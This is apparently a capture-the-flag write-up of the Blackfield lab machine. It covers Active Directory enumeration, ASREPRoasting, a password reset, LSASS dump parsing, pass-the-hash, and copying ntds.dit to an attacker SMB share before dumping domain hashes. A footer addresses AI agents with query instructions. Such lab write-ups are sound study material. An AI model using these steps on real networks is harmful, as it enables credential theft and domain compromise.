# Blackfield
## Enumeration As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports. The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.192 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. {% code overflow="wrap" %} ```bash # Nmap 7.93 scan initiated Wed Apr 5 09:35:24 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.192 Nmap scan report for 10.10.10.192 Host is up (0.099s latency). Not shown: 65525 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 593/tcp open http-rpc-epmap 3268/tcp open globalcatLDAP 5985/tcp open wsman 49676/tcp open unknown # Nmap done at Wed Apr 5 09:36:17 2023 -- 1 IP address (1 host up) scanned in 53.23 seconds ``` {% endcode %} Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file: > nmap -sC -sV -p53,88,135,139,389,445,593,3268,5985,49676 10.10.10.192 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. {% code overflow="wrap" %} ```bash # Nmap 7.93 scan initiated Wed Apr 5 09:36:40 2023 as: nmap -sCV -p53,88,135,139,389,445,593,3268,5985,49676 -Pn -n -oN targeted 10.10.10.192 Nmap scan report for 10.10.10.192 Host is up (0.067s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-05 15:36:49Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp filtered netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49676/tcp filtered unknown Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 311: |_ Message signing enabled and required | smb2-time: | date: 2023-04-05T15:36:56 |_ start_date: N/A |_clock-skew: 8h00m00s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Apr 5 09:37:32 2023 -- 1 IP address (1 host up) scanned in 51.93 seconds ``` {% endcode %} Port 53 is open, so we can enumerate all the possible subdomains for the `blackfield.local` domain name with *dig*. > dig any blackfield.local @10.10.10.192 {% code overflow="wrap" %} ``` ; <<>> DiG 9.18.11-2-Debian <<>> any blackfield.local @10.10.10.192 ;; global options: +cmd ;; Got answer: ;; WARNING: .local is reserved for Multicast DNS ;; You are currently testing what happens when an mDNS query is leaked to DNS ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53091 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4000 ;; QUESTION SECTION: ;blackfield.local. IN ANY ;; ANSWER SECTION: blackfield.local. 600 IN A 10.10.10.192 blackfield.local. 3600 IN NS dc01.blackfield.local. blackfield.local. 3600 IN SOA dc01.blackfield.local. hostmaster.blackfield.local. 165 900 600 86400 3600 blackfield.local. 600 IN AAAA dead:beef::59ff:6dfe:cd4c:21f9 ;; ADDITIONAL SECTION: dc01.blackfield.local. 3600 IN A 10.10.10.192 dc01.blackfield.local. 3600 IN AAAA dead:beef::59ff:6dfe:cd4c:21f9 ;; Query time: 36 msec ;; SERVER: 10.10.10.192#53(10.10.10.192) (TCP) ;; WHEN: Wed Apr 05 11:36:42 CEST 2023 ;; MSG SIZE rcvd: 199 ``` {% endcode %} Let's add all these subdomain names to the `/etc/hosts` file. > nano /etc/hosts {% code overflow="wrap" %} ``` # Host addresses 127.0.0.1 localhost 127.0.1.1 alfa8sa ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes f02::2 ip6-allrouters 10.10.10.192 blackfield.local dc01.blackfield.local hostmaster.blackfield.local ``` {% endcode %} Let' keep enumerating the domain controller. We can check if there is any interesting share hosted in the SMB server. > smbmap -H 10.10.10.192 -u 'guest' {% code overflow="wrap" %} ``` [+] IP: 10.10.10.192:445 Name: blackfield.local Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share forensic NO ACCESS Forensic / Audit share. IPC$ READ ONLY Remote IPC NETLOGON NO ACCESS Logon server share profiles$ READ ONLY SYSVOL NO ACCESS Logon server share ``` {% endcode %} If we check the share, we'll see a bunch of directories called like possible users. > smbmap -H 10.10.10.192 -u 'guest' -r profiles$ {% code overflow="wrap" %} ``` [+] IP: 10.10.10.192:445 Name: blackfield.local Disk Permissions Comment ---- ----------- ------- profiles$ READ ONLY .\profiles$\* dr--r--r-- 0 Wed Jun 3 18:47:12 2020 . dr--r--r-- 0 Wed Jun 3 18:47:12 2020 .. dr--r--r-- 0 Wed Jun 3 18:47:11 2020 AAlleni dr--r--r-- 0 Wed Jun 3 18:47:11 2020 ABarteski dr--r--r-- 0 Wed Jun 3 18:47:11 2020 ABekesz ... dr--r--r-- 0 Wed Jun 3 18:47:12 2020 ZScozzari dr--r--r-- 0 Wed Jun 3 18:47:12 2020 ZTimofeeff dr--r--r-- 0 Wed Jun 3 18:47:12 2020 ZWausik ``` {% endcode %} ## Exploitation Let's put those usernames in the `users` file. > smbmap -H 10.10.10.192 -u 'guest' -r profiles$ | grep "dr--r--r--" | awk '{print $8}' > users As the domain controller has the *Kerberos* service exposed, we can verify if any of these users is valid using *kerbrute*. > kerbrute\_linux\_amd64 userenum --dc 10.10.10.192 -d blackfield.local users ``` __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 04/05/23 - Ronnie Flathers @ropnop 2023/04/05 12:38:10 > Using KDC(s): 2023/04/05 12:38:10 > 10.10.10.192:88 2023/04/05 12:38:31 > [+] VALID USERNAME: audit2020@blackfield.local 2023/04/05 12:40:23 > [+] VALID USERNAME: support@blackfield.local 2023/04/05 12:40:28 > [+] VALID USERNAME: svc_backup@blackfield.local 2023/04/05 12:40:53 > Done! Tested 314 usernames (3 valid) in 162.879 seconds ``` Now that we have a list of valid users, put them into a file, and let's try to do an *ASREPRoast* attack. {% hint style="info" %} **ASREPRoast** attack: when a user does not need *pre-authentication*, it is possible to obtain a *TGT*, without knowing the user's credentials, which contain data encrypted with the user's hash, which can be used for offline cracking. {% endhint %} > impacket-GetNPUsers blackfield.local/ -no-pass -usersfile valid\_users * `-no-pass` don't ask for **password**. * `-usersfile` file which contains **user** per line. {% code overflow="wrap" %} ``` Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [-] User audit2020@BLACKFIELD.local doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$support@BLACKFIELD.local@BLACKFIELD.LOCAL:ebd84a2b32ac125aa65fb405985c0a48$4861262f396e28b5d77218ffc4ae62e5e89315cbb26ea97fa75cab030ab186c5e0a1b3e6d9ee0526f3e46dbddd79dd252d77ef77daee5072b5d7bc8beaf5e709f710baae3d0a80fb9f17043f2b0f5b9134bcd27c6b379070ce9d8c7e59b7ac1e21837d2f58ecbb991ee6317ecaac8504b5cfd3ad8e43c6c158f44d855e00bafb2293b147cec5c1528ee3449ee8a4bf9bd7dcfc89e3b5871485cd9d1849a05fbf035c85e89a9921a0892f6d1f75c6c4a3e941ec7c6c792ec67cab1a4bae065e6ae17c7aa53320d66f718c8c0713c15a59710266e7b7b159d7919ebecdf54352f368e22c2e87caa611c929348a1518748cb9b323a3 [-] User svc_backup@BLACKFIELD.local doesn't have UF_DONT_REQUIRE_PREAUTH set ``` {% endcode %} We get a hash of the support user. Let's try to break it with *john*. > john -w=/usr/share/wordlists/rockyou.txt hash {% code overflow="wrap" %} ``` Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status #00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.local@BLACKFIELD.LOCAL) 1g 0:00:00:10 DONE (2023-04-05 12:42) 0.09132g/s 1309Kp/s 1309Kc/s 1309KC/s #1ByNature..#*burberry#*1990 Use the "--show" option to display all of the cracked passwords reliably Session completed. ``` {% endcode %} Let's use the credentials that we have to enumerate the domain controller more in depth with *bloodhound-python*. > bloodhound-python -c All -u 'support' -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local {% code overflow="wrap" %} ``` INFO: Found AD domain: blackfield.local INFO: Getting TGT for user INFO: Connecting to LDAP server: dc01.blackfield.local INFO: Kerberos auth to LDAP failed, trying NTLM INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 18 computers INFO: Connecting to LDAP server: dc01.blackfield.local INFO: Kerberos auth to LDAP failed, trying NTLM INFO: Found 316 users INFO: Found 52 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: INFO: Querying computer: DC01.BLACKFIELD.local WARNING: Failed to get service ticket for DC01.BLACKFIELD.local, falling back to NTLM auth CRITICAL: CCache file is not found. Skipping... WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) INFO: Done in 00M 10S ``` {% endcode %} Now, we have to start *BloodHound*. First, we have to start *neo4j.* > neo4j console Then we will search for the localhost on port 4747 and log in with the username *neo4j* and password *neo4j*. You’ll have to change the password. On a new console, run BloodHound. > bloodhound -nosandbox Then log in with the credentials you set up earlier. ![](/files/TWcXCH3vGcq32lGTW9iR) Then, click on the *Upload Data* button on the right section and select all the `.json` files generated with *bloodhound-python*. ![](/files/Tt1fT4gsaMJKCi2iy3pc) Once all the `.json` files are uploaded, search for the user `support@blackfield.local`, and we'll see in the `First Degree Object Control` section that the `support` user has the privilege to change the password of the `audit2020` user.
We can change the password of the `audit2020` user as `support` using *rpcclient*. > rpcclient -N -U 'support%#00^BlackKnight' 10.10.10.192 -c "setuserinfo2 audit2020 23 alfa8sa123$" Verify that the credentials are valid. > crackmapexec smb 10.10.10.192 -u 'audit2020' -p 'alfa8sa123$' ``` SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:alfa8sa123$ ``` Now that we have valid credentials for the `audit2020` user, let's see if we have access to any other share. > smbmap -H 10.10.10.192 -u 'audit2020' -p 'alfa8sa123$' {% code overflow="wrap" %} ``` [+] IP: 10.10.10.192:445 Name: blackfield.local Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share forensic READ ONLY Forensic / Audit share. IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share profiles$ READ ONLY SYSVOL READ ONLY Logon server share ``` {% endcode %} There is one more interesting share in which we have read permissions. Let's mount the `forensic` share to our local system. > mount -t cifs //10.10.10.192/forensic /mnt/forensic/ -o "username=audit2020,password=alfa8sa123!$,domain=BLACKFIELD.local,rw" Inside there is a directory called `memory_analysis`. > ls -l /mnt/forensic/ ``` total 0 drwxr-xr-x 2 root root 0 Feb 23 2020 commands_output drwxr-xr-x 2 root root 0 May 28 2020 memory_analysis drwxr-xr-x 2 root root 0 Feb 23 2020 tools ``` This directory has ZIP files. There is one called `lsass.zip`. If this file has the LSASS memory compressed in it, we could extract passwords and hashes from it. > ls -l /mnt/forensic/memory\_analysis/ ``` total 506000 -rwxr-xr-x 1 root root 37876530 May 28 2020 conhost.zip -rwxr-xr-x 1 root root 24962333 May 28 2020 ctfmon.zip -rwxr-xr-x 1 root root 23993305 May 28 2020 dfsrs.zip -rwxr-xr-x 1 root root 18366396 May 28 2020 dllhost.zip -rwxr-xr-x 1 root root 8810157 May 28 2020 ismserv.zip -rwxr-xr-x 1 root root 41936098 May 28 2020 lsass.zip -rwxr-xr-x 1 root root 64288607 May 28 2020 mmc.zip -rwxr-xr-x 1 root root 13332174 May 28 2020 RuntimeBroker.zip -rwxr-xr-x 1 root root 131983313 May 28 2020 ServerManager.zip -rwxr-xr-x 1 root root 33141744 May 28 2020 sihost.zip -rwxr-xr-x 1 root root 33756344 May 28 2020 smartscreen.zip -rwxr-xr-x 1 root root 14408833 May 28 2020 svchost.zip -rwxr-xr-x 1 root root 34631412 May 28 2020 taskhostw.zip -rwxr-xr-x 1 root root 14255089 May 28 2020 winlogon.zip -rwxr-xr-x 1 root root 4067425 May 28 2020 wlms.zip -rwxr-xr-x 1 root root 18303252 May 28 2020 WmiPrvSE.zip ``` Transfer it to our current directory, and decompress it. > cp /mnt/forensic/memory\_analysis/lsass.zip . > > unzip lsass.zip Now we have the lsass.DMP file. Usually, the *LSASS* memory is dumped from the local Windows system using *Mimikatz*, but as we don't have access to the system we can use a tool called *pypykatz*. > pypykatz lsa minidump lsass.DMP ``` INFO:pypykatz:Parsing file lsass.DMP FILE: ======== lsass.DMP ======= ... == MSV == Username: svc_backup Domain: BLACKFIELD LM: NA NT: 9658d1d1dcd9250115e2205d9f48400d SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c DPAPI: a03cd8e9d30171f3cfe8caad92fef621 == WDIGEST [633ba]== username svc_backup domainname BLACKFIELD password None password (hex) == Kerberos == Username: svc_backup Domain: BLACKFIELD.LOCAL == WDIGEST [633ba]== username svc_backup domainname BLACKFIELD password None password (hex) ... ``` Among other hashes, we get the NTLM hash of the `svc_backup`, which seems to be in the *Remote Management Users* because we can get a shell via *WinRM*. Then, we'll be able to grab the user flag. > evil-winrm -i 10.10.10.192 -u 'svc\_backup' -H 9658d1d1dcd9250115e2205d9f48400d {% code overflow="wrap" %} ``` Evil-WinRM shell v3.4 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami blackfield\svc_backup *Evil-WinRM* PS C:\Users\svc_backup\Documents> type \users\svc_backup\desktop\user.txt 3920bb317a0bef51027e2852be64b543 ``` {% endcode %} ## Privilege Escalation Indeed, the `svc_backup` user is a member of the *Remote Management Users*, but it is also a member of the *Backup Operators* group. {% hint style="info" %} The **Backup Operators** group grants its members the *SeBackup* and *SeRestore* privileges. The SeBackupPrivilege allows you to traverse any folder and list the folder contents and copy a file from a folder, even if nothing else is giving you permission. {% endhint %} > net user svc\_backup ``` User name svc_backup Full Name Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 2/23/2020 10:54:48 AM Password expires Never Password changeable 2/24/2020 10:54:48 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 4/5/2023 9:00:19 AM Logon hours allowed All Local Group Memberships *Backup Operators *Remote Management Use Global Group memberships *Domain Users The command completed successfully. ``` The idea is to copy the `ntds.dit` file to our system, so we can extract the NTLM hashes of all the domain users. We can follow the article [Dumping Domain Password Hashes](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/).First, set a simple SMB server on the current directory. > impacket-smbserver smbFolder $(pwd) -smb2support Now, go the `\windows\temp`, create the directory `privEsc`, and get in there. > cd \windows\temp > > mkdir privEsc > > cd privEsc Then, create a new file called `diskshadow.txt` and upload it to the victim machine. Make sure to add a blank space at the end of each line. > nano diskshadow\.txt > > upload /home/alfa8sa/HTB/machines/blackfield/diskshadow\.txt ``` set context persistent nowriters add volume c: alias someAlias create expose %someAlias% z: ``` Run the *diskshadow* tool together with the `diskshadow.txt` to create a new logical disk and create a copy of `C:\` in it. > diskshadow\.exe /s diskshadow\.txt ``` Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: DC01, 4/5/2023 12:35:51 PM -> set context persistent nowriters -> add volume c: alias someAlias -> create Alias someAlias for shadow ID {3abd85c1-910d-4b72-86cc-871254097018} set as environment variable. Alias VSS_SHADOW_SET for shadow set ID {4adb43d3-6632-4dd0-b257-0e6232d6d1d7} set as environment variable. Querying all shadow copies with the shadow copy set ID {4adb43d3-6632-4dd0-b257-0e6232d6d1d7} * Shadow copy ID = {3abd85c1-910d-4b72-86cc-871254097018} %someAlias% - Shadow copy set: {4adb43d3-6632-4dd0-b257-0e6232d6d1d7} %VSS_SHADOW_SET% - Original count of shadow copies = 1 - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\] - Creation time: 4/5/2023 12:35:52 PM - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 - Originating machine: DC01.BLACKFIELD.local - Service machine: DC01.BLACKFIELD.local - Not exposed - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - Attributes: No_Auto_Release Persistent No_Writers Differential Number of shadow copies listed: 1 -> expose %someAlias% z: -> %someAlias% = {3abd85c1-910d-4b72-86cc-871254097018} The shadow copy was successfully exposed as z:\. -> ``` Now, we should see the `ntds.dit` in the `z:` disk. > dir z:\windows\ntds ``` Directory: z:\windows\ntds Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 1/23/2023 2:34 PM 8192 edb.chk -a---- 4/5/2023 12:35 PM 10485760 edb.log -a---- 2/23/2020 9:41 AM 10485760 edb00004.log -a---- 2/23/2020 9:41 AM 10485760 edb00005.log -a---- 2/23/2020 3:13 AM 10485760 edbres00001.jrs -a---- 2/23/2020 3:13 AM 10485760 edbres00002.jrs -a---- 2/23/2020 9:41 AM 10485760 edbtmp.log -a---- 4/5/2023 12:30 PM 18874368 ntds.dit -a---- 4/5/2023 12:30 PM 16384 ntds.jfm -a---- 4/5/2023 12:30 PM 434176 temp.edb ``` Let's copy it to our local SMB server with *robocopy*. > robocopy /b z:\windows\ntds \10.10.14.5\smbFolder\ ntds.dit We will also need a copy of `HKLM\system`. > reg save HKLM\system \10.10.14.5\smbFolder\system Finally, we can extract the NTLM hashes with *secretsdump*. > impacket-secretsdump -system system -ntds ntds.dit LOCAL {% code overflow="wrap" %} ``` Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c [*] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DC01$:1000:aad3b435b51404eeaad3b435b51404ee:2a2f8ac26db968c93a17fefdb36c38ee::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d::: audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa::: support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212::: ... ``` {% endcode %} As we have the NTLM hash of the *administrator* user, we can get a shell. Then, all we have to do is reap the harvest and take the root flag. > evil-winrm -i 10.10.10.192 -u 'administrator' -H 184fb5e5178480be64824d4cd53b99ee {% code overflow="wrap" %} ``` Evil-WinRM shell v3.4 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami blackfield\administrator *Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt 4375a629c7c67c8e29db269060c955cb ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alfa8sa.gitbook.io/htb-writeups/windows-machines/blackfield.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.